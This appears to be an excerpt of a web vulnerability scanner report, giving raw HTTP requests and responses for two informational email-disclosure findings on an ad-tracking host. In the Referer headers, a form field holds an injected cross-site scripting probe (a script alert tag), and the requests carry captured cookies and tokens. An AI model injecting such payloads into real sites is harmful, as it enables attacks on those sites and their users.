Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28/DORK/%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3ATc1LCoAgFEDRvbyxgww0cTdlhn00U6hM23tlDZpeDtwIawk8wijDNrvWAwehJtoHKkPCDjPDEk4F8oXSVcJW0Mnn8KmOZDUvr2I6tHeordh%2FigxHVlY9ERA0tTHS9XkH53kB"; rb2=CiMKBjc0MjY5NxiAvsP4DiITMzY1ODE5NTk2NjAyOTQxNzk3MAouCgY3NjI3MDEY2uORrBYiHkUzRjMyQkQwOTU0NkM5NERBRDk1RDFCNTQwMTEwQxAB; rb=0:742697:20828160:3658195966029417970:0:762701:20861280:E3F32BD09546C94DAD95D1B540110C:0; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4dd006b1@www.hubspot.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3ALc1LCoAgFEDRvbxxgwwyaTeWhn00UyrM594ra3o5cCMcFbQRZhnO1QkPLfRqoWOgMiBxhBmGBMvCl0o3SGxPF5%2FDr4Y6q3X7FNNBPIFb4bDC%2FVf1dGVl1auggI4bI92Yd5DSDQ%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 17:01:03 GMT
Set-Cookie: vsd=0@2@4dd006cf@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 17:01:03 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 17:01:03 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.5. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd00500@www.hubspot.com

Request

Response

19.6. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd00701@www.hubspot.com

Request

GET /click/bstats.gif?kid=47432245&bapid=10434&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28%22DORK%22%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3ALc1NDkAwEEDhu8zawhDVuI2fStFWtQmpjrujbF%2B%2B5EXYC2giLCIcqxs8NNBLxabARCB0yA0npDzzudQ1oe2Z8in8aqySWrdPcR2GJ7RWWCoJ%2Fc%2Bq%2BUzMypdBBl1rjHBT%2BsF13Q%3D%3D"; rb2=CiMKBjc0MjY5NxiAvsP4DiITMzY1ODE5NTk2NjAyOTQxNzk3MAouCgY3NjI3MDEY2uORrBYiHkUzRjMyQkQwOTU0NkM5NERBRDk1RDFCNTQwMTEwQxAB; rb=0:742697:20828160:3658195966029417970:0:762701:20861280:E3F32BD09546C94DAD95D1B540110C:0; srh="1%3Aq64FAA%3D%3D"; vsd=0@3@4dd006f1@www.hubspot.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3ALc1LCoAgFEDRvbxxg5QyaTdlhv3MFArzuffMml4O3AAnhTbAIv2128FBC0KtbPJMeiSWcM2RYFm4Um0NEiPY6nL41VhntR%2Bf4psfUuhM6hVS%2FrN6vjMz6mVQQN9pLe2UfxDjAw%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 17:01:53 GMT
Set-Cookie: vsd=0@4@4dd00701@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 17:01:53 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 17:01:53 GMT
Content-Length: 42

